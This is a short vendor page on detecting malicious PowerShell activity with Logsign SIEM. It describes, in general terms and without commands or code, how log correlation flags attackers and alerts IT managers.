SIEM Use Cases

Detecting and Preventing Malicious PowerShell Attacks

As a strong Windows command file language, PowerShell is used by both IT specialists and attackers. PowerShell is an on-board command line tool. You can download and execute codes from another system. PowerShell enables a unique access on Windows computers. As system managers use PowerShell to automatize various tasks, it is activated on many computers. As the files and commands are not written on a disc, the malicious use of them are generally not prevented or perceived by traditional AV/HIPS. Despite these difficulties, it is not ideal to remove PowerShell due to the benefits it provides for IT managers. A widespread problem we face is the lack of saving on the usable log in order to understand the actions of the attacker conducted with PowerShell. These logs will assist you in obtaining the necessary visibility in order to better respond to, search, and correct the attacks related to PowerShell.

How to detect and prevent malicious PowerShell attacks

PowerShell activities on Windows systems can be detected by being subjected to correlation processes by Logsign SIEM. PowerShell control logs, process creation logs, EDR logs are used during the detection process. Cyber attacks are detected by means of the findings obtained as a result of the analysis of the logs.
1.

PowerShell control logs, process creation logs, and EDR logs on Windows are shared with Logsign SIEM and subject to relevant correlation processes.

2.

The user is labelled as Attacker, Victim, Suspicious following the behavioral analysis with correlation operations.

3.

Following the first activity started by the attacker on the user’s side, the logs are enriched by means of behavioral analysis with the logs received from the sources. Log activities formed with the attacker’s activities are subject to correlation and displayed on the relevant dashboard panels.

4.

Malicious PowerShell attacks detected by Logsign correlation motor can be perceived and revealed by Logsign SIEM and shared with relevant IT managers in SMS and e-mail after being analyzed.

Other SIEM Use Cases